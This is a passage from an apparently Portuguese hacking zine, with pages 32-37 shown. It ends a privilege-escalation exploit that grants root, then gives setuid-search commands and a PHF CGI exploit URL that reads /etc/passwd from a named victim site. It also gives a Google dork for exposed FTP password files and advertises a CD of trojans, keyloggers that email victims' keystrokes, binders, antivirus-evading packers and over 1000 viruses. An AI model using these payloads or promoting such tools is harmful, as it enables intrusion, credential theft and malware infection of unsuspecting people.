  • 32. execl("/usr/sbin/ppp", "ppp", NULL); } Agora voce tem o root. Dicas de exploits em UNIX Estes são exploits usando comandos básicos de Unix, eu nem chamaria de exploits mas é legal para começar a estudar. Procurar por arquivos ocultos find / -name ".. " -print -xdev find / -name ".*" -print -xdev |cat -v Procurar por todos os diretórios com permissão de gravar (R) find / -perm -0777 -type -d -ls Procurando arquivos setuid no filesystem Os arquivos setuid habilitados pode ser usado para tentar ganhar privilegio do root find / -user root -perm -4000 -exec ls -ldb {} ; find / -perm -4000 find / -type f -perm -4000 -exec ls -l {} ; Procurar por todos os arquivos setgid no filesystem. find / -group root -perm -2000 -exec ls -ldb {} ; BUG de PHF Este exploit é muito antigo, muito dificio achar um servidor desatualizado. Basta colocar o exploit no seu navegador.Exploit: /cgi-bin/phf?Qalias=x%0a/bin/cat% 20/etc/passwd ele mostrará o diretório das senhas, você coloca o exploit na frende da URL do site, exemplo: http://www.sitevitima.com /cgi-bin/phf?Qalias=x%0a/bin/cat% 20/etc/passwd
  • 33. Principais Falhas de FTP - Não existe criptografia nos dados transmitidos, textos puros, senhas podem ser capturadas faciomente com um sniffer. - Existem servidores que deixam arquivos.ini expostos de contendo senhas de FTP, e o google consegue localizar estes arquivos, por exemplo: Digite filetype:ini ws_ftp pwd no google, você vai ver a quantidade de arquivos expostos. - Tem gente que ainda deixa root sem senha - Como os navegadores interagem com FTP, link de download direto, você pode invadir um FTP e “linkar” os arquivos para download, tipo: ftp://dominio/diretorios/arquivo Login anônimo, deixa você navegar pelo servidor e visualizar dados que podem te elevar a root Como vocês pedem notar isto é o básico. Não parem de estudar, e principalmente compartilhar informação. Se quiserem entrar em contato comigo para tirar alguma dúvida: Email: rackerox@webexploiter.com MSN rackerox@hotmail.com Praga de Orkut: http://www.orkut.com/Profile.aspx?uid=4380671928865807152
  • 34. CD ROOM HACKING TOOLS O Hacking Tools é um CD de softwares voltado para quem gosta de Hacking em informática. Não é apenas mais um CD de programas de invasão, nele vc encontra suporte para Redes, Programação, Comunicação de dados, TCP/IP, Scans, Exploiters, etc..Também tem os trojans e keyllogers .Resumindo todos os tipos de programas que vc precisa para se tornar um hacker de verdade, e não apenas mais um Lamer que sabe rouba senha com KL e invadir por cookies =) No CD tem uma descrição de cada tipo de programa, e cada programa vem com um "readme" sobre o seu funcionamento. Para comprar o CD entre no site: www.cdhackingtools.com Conteudo do CD: Redes/Internet -Emita Pacotes UDP (com opção de tamanho de Buffer) para qualquer porta -Programas para conexão remota ( com suporte para diferentes roteadores ) -Faça uma lista de todas as portas TCP e UDP abertas em seu computador. -Capture pacotes de IP contendo protocolos http em sua rede -Procure por pastas compartilhadas -Desligue um computador de rede local ou através da Internet. -Altere o seu endereço MAC -Capture informações de sua rede, conexões são estabelecidas, chats, etc. e monitore tudo á distancia via email. -Verifique o status de qualquer servidor na internet -Faça do seu computador um servidor de internet. -Capture todas as informações do tráfego de sua rede/conexão. -Recupere de FTM, SMTP, POP3, http, mySQL, ICQ, Telnet e também senhas protegidas por asteriscos (útil para senhas de wireless). -Deixe qualquer porta de seu computador em escuta e crie um log de texto. -Faça DNS Spoofing ( redirecione qualquer endereço de site para o site que você quiser) -Mapeie qualquer porta de seu pc para outra maquina -Monitore qualquer servidor http, smtp, pop3 -Envie emails diretamente para seu pc, faça um diagnostico qualquer servidor smtp -Editor de cookies -E muito mais... são vários programas de snifers, scans, telnet, etc. Exploiters/Scans Um exploit, é um programa com uma porção de dados ou uma sequência de comandos que se aproveita das vulnerabilidades de um sistema computacional – como o próprio sistema operativo ou serviços de interação de protocolos (ex: servidores Web). São geralmente elaborados por hackers como programas de demonstração das vulnerabilidades, a fim de que as falhas sejam corrigidas, ou por crackers a fim de ganhar acesso não autorizado a sistemas. Trojans Backdoors Um meio secreto ou não documentado de invadir um sistema de computador . Trojan backdoor é um programa que age como a lenda do cavalo de tróia. entrando no computador , e liberando uma porta para um possível invasor. Os trojans atuais são divididos em duas partes: o servidor e o cliente Normalmente, o servidor está oculto em algum outro arquivo e, no momento que esse arquivo é executado, o servidor se instala e se oculta no computador da vítima; a partir deste momento, o computador pode ser acessado pelo cliente, que irá enviar informações para o servidor executar certas operações no computador da vítima. Resumindo : Servidor é o vírus trojan que vai se instalar no pc da vítima Cliente é o programa que esta no seu pc E vc precisa de um endereço para conectar o servidor ao cliente ,este endereço é o IP Keyloggers Keylogger (que significa registrador do teclado em inglês) é um programa de computador cuja finalidade é monitorar tudo o que é digitado.Instalado no computador sem o conhecimento da vítima o keylogger captura dados sensíveis e os envia a um cracker.Neste CD existe Keyloggers que são programáveis para enviar os logs para o email de uma pessoa.
  • 35. Bruteforces (Força Bruta): técnica de intrusão de sistemas que se baseia em tentativa e erro. São geradas palavras e a combinação destas com em nomes de usuários e senhas é tentada exaustivamente até que um usuário válido seja encontrado.Ferramentas para força bruta em: - HTTP Basic Auth - HTTP Form - FTP - POP3 - TELNET - SMB (Netbios) - Custom IP Scans Procure portas abertas e falhas de seguranças de um determinado IP ou uma faixa de IP específica. Obtenha resolução de host names, checagem de portas abertas, varredura de máquinas mortas, varreduras de múltiplas portas. Faça scans até de IP que não respondem ao ping. Procure trojans instalados em uma determinada faixa de IP. Nuckers Nuke é o nome atribuído a programas que finalizam prematuramente com uma conexão TCP através do envio de pacotes ICMP com mensagens de erro. Tais pacotes podem ser direcionadas para o servidor (server side nuke) ou para o cliente (client side nuke). Tais programas tem a propriedade de terminar com a conexão fazendo com que o cliente ou o servidor sejam enganados por uma mensagem de erro que normalmente indicaria um problema de conexão entre os dois. Binders Ferramenta que combina dois ou mais arquivos em um só, geralmente, com o fim de ocultar um deles. Um binder compila a lista selecionada em um arquivo host, que poderá ser renomeado. Arquivo host é um programa simples compilado e personalizado que irá descompactar e executar os programas de origem. A iniciar o host, os arquivos incorporados são automaticamente descompactados e executados. Quando um cavalo de Tróia está vinculado ao Notepad, por exemplo, a sua aparência e execução irão se assemelhar ao Notepad, mas o cavalo de Tróia também será executado Criptografia Programas de codificação e Decodificação de dados. Criptografia de arquivos em pastas, web ,dados,scripts etc. Programaçao O CD contem varias ferramentas de programação. Editores de HTML, PHP , Javascript, binary, hexadecimal. Ambiente de Programação em C C++ SQL Ruby Java CSS HTML PHP PERL COBOL Tradutor de Algoritmos. Programas para vc desenvolver o seu software. Gerador de programa de instalação etc. Compiladores Compiladores são programas que permitem transformar códigos escrito na linguagem de programação usada em linguagem de máquina, gerando o binário que pode ser executado. No CD contem compiladores de C C++ Assesmbler Perl Resource Modifique, extraia e insira Resources em executáveis, você pode mudar totalmente um programa de 32 bits .Você pode mudar caixas de diálogo, ícones e outras coisas. Conversores Corverta vários formatos de arquivo. De bat para exe, html para exe, pps para exe, vbs para exe, áudio e vídeo para exe, swf para exe, decompilador de flash, conversor de email para (PDF, HTML, RTF, TXT, DOC, MCW, WPS, SAM, RFT, WS4, WRI, etc.). Compressores Compressores são programas que executa partes do código ao mesmo nivel de prioridade que o sistema operacional permite supervisar e controlar as aplicações executadas. Excelente para que você esconda seus virus de modo que o antivirus não detecte. Compactadores São programas que usam certas técnicas para criar um arquivo, que contém vários arquivos e/ou pastas compactados.No cd contem os programas Winrar, Winzip e UPX
  • 36. Ferramentas web Ferramentas para você usar em websites,programas de FTP ,download de sites , Gerenciador de download .etc . Ferramentas windows Ferramentas para alterar o seu windows , gerenciador de registro, remova windows pirata, temas, limpeza de disco, manutenção do sistema, proteção de arquivos, etc. Vírus Um vírus de computador nada mais é do que um programa que fica “residente” na memória do microcomputador , e de acordo com determinados parâmetros executa uma ação (normalmente danosa)o cd contem mais de 1000 virus, Virus Builders, arquivos de batch. Msn/orkut São mais de 70 programas para msn . Sniffers para capturar conversas de msn na sua rede Coloque o vídeo que vc quiser na imagem da sua webcan. Envie qualquer arquivo que o msn bloqueia. Programas de flood. Faça um log de todas as musicas que seu amigo ouviu. "Roube" as imagens de exibição, emotions, etc. dos seus contatos. Pegue o IP de seu amigo. Envie uma mensagem automática quando seu amigo fechar sua janela. Traduza suas mensagens na janela de contato apertando a tecla F5, Transforme tudo o que você digitar em link de pesquisa E muito mais.... ou seja um pacote de programas que vai muito alem do Discovery. Mais clientes de msn alem do windows messenger. Veja quem te excluiu, que esta aparecendo offline, fale com o nick do seu amigo etc (Discovery) Programas para orkut e mirc. Servidores Servidor é um sistema de computação que fornece serviços a uma rede de computadores tanto rede local como à internet. O cd contem servidore de: Email, HTTP, FTP, DNS, PHP, SSH e PERL. Hospede seu site em seu próprio computador. Clientes Programas que acessam os serviços de um servidor. Telnet, SSH Segurança Programas para ajudar na sua segurança, não um kit de anti vírus. Controla as portas de entrada do computador, detecte websites fraudulentos, remova spywares, keyloggers, e adwares, Monitore a segurança de seu computador à distancia. Crie um emulador de terminal Telnet e SSH. Ferramentas gerais Recupere senhas, Altere ícones, resete senha do usuário, crie seus próprios auto executáveis, monitor de webcan, gerenciador de uploads Mais Navegadoes: Firefox,Netscape,Opera e Safari Rode o Linux dentro do windows Sistemas operacionais Programas que rodam do pen drive Códigos fontes do: Secure Internet Communication Suíte. Crack Whore 2.2 (Fonte do programa feito para testar a segurança dos sites.) GnuPG , Java Telnet Applet, Pattern Finder, Ultimate (boot), Zodiac.
  • 37. EQUIPE HALL OF HACKERSEQUIPE HALL OF HACKERSEQUIPE HALL OF HACKERSEQUIPE HALL OF HACKERS A Hall of Hackers foi criada em dezembro de 2006. Nosso intuito NÃO é promover nenhum tipo de prática maliciosa. O “conhecimento hacker” infelizmente ainda é muito restrito e visto com preconceito, nós da Hall of Hackers somos inteiramente a favor da liberdade de informação. Hacker não é quem fica praticando crimes virtuais. Hacker desenvolve sistemas, programas, ou seja, quem realmente estuda. Nossa comunidade http://www.orkut.com/Community.aspx?cmm=22006772 NOSSOS PROGETOS: Orkut Community Hall of Hackers CD Room de Softwares www.cdhackingtools.com Scan On Line www.webexploiter.com Blog Hacking http://insecuritynet.blogspot.com